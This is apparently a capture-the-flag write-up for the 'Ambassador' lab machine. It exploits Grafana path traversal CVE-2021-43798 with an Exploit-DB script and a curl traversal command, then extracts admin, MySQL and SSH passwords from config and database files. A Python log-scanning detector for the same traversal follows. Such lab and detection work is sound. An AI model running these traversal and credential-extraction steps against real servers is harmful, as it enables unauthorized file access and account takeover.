Rustscan
rustscan -a ambassador.htb --ulimit 5000
Website on port 80
Website on port 3000
Grafana version 8.2.0
CVE-2021-43798
https://www.exploit-db.com/exploits/50581
So, I had to download it and run it like this:
python3 50581.py -H http://ambassador.htb:3000
Then I select the file I want to read (e.g. /etc/passwd).
/etc/grafana/grafana.ini
# default admin user, created on startup
;admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = messageInABottle685427
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
I’m in. I’m listing the plugins; maybe I can upload a reverse shell on it.
Maybe the interesting thing to do was searching the files with the last exploit.
I have to find the password.
curl --path-as-is http://ambassador.htb:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
sqlite3 grafana.db
I need to find the Grafana creds to log in to the MySQL database.
SELECT * FROM data_source;
2|1|1|mysql|mysql.yaml|proxy||dontStandSoCloseToMe63221!|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2022-10-08 20:21:56|0|{}|1|uKewFgM4z
Password = dontStandSoCloseToMe63221!
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
ssh
618dafc87c795ef87e5f672b4a3902a4
anEnglishManInNewYork027468
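Detection side of the traversal requests above, as an added example that is not part of the original notes: it scans access-log lines for requests under /public/plugins/<id>/ whose path resolves outside the plugin directory. The combined log format (for example from a reverse proxy in front of Grafana), the sample entries and the function names are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

PLUGIN_PREFIX = "/public/plugins/"
# Request target and status of a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample entries (addresses are documentation ranges).
SAMPLE_LOG = [
    '198.51.100.4 - - [08/Oct/2022:20:01:02 +0000] "GET /login HTTP/1.1" 200 2210',
    '203.0.113.7 - - [08/Oct/2022:20:01:15 +0000] "GET /public/plugins/alertlist/'
    '../../../../../../../../etc/grafana/grafana.ini HTTP/1.1" 200 31002',
    '203.0.113.7 - - [08/Oct/2022:20:01:19 +0000] "GET /public/plugins/alertlist/'
    '%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 0',
    '198.51.100.4 - - [08/Oct/2022:20:02:40 +0000] "GET /public/plugins/alertlist/'
    'img/../module.js HTTP/1.1" 200 5120',
]

def escapes_plugin_dir(target):
    """Return the resolved path if target leaves /public/plugins/<id>/, else None."""
    path = urlsplit(target).path
    for _ in range(2):  # undo single and double percent-encoding of dot segments
        path = unquote(path)
    if not path.startswith(PLUGIN_PREFIX):
        return None
    plugin_id = path[len(PLUGIN_PREFIX):].split("/", 1)[0]
    if not plugin_id:
        return None
    plugin_root = PLUGIN_PREFIX + plugin_id
    resolved = posixpath.normpath(path)
    if resolved == plugin_root or resolved.startswith(plugin_root + "/"):
        return None  # dot segments, if any, stay inside the plugin directory
    return resolved

def scan(lines):
    """Return (line number, HTTP status, resolved path) for each traversal attempt."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            resolved = escapes_plugin_dir(match["target"])
            if resolved is not None:
                hits.append((number, int(match["status"]), resolved))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the file was actually served, so any secrets in it (grafana.ini, grafana.db) should be treated as exposed and rotated.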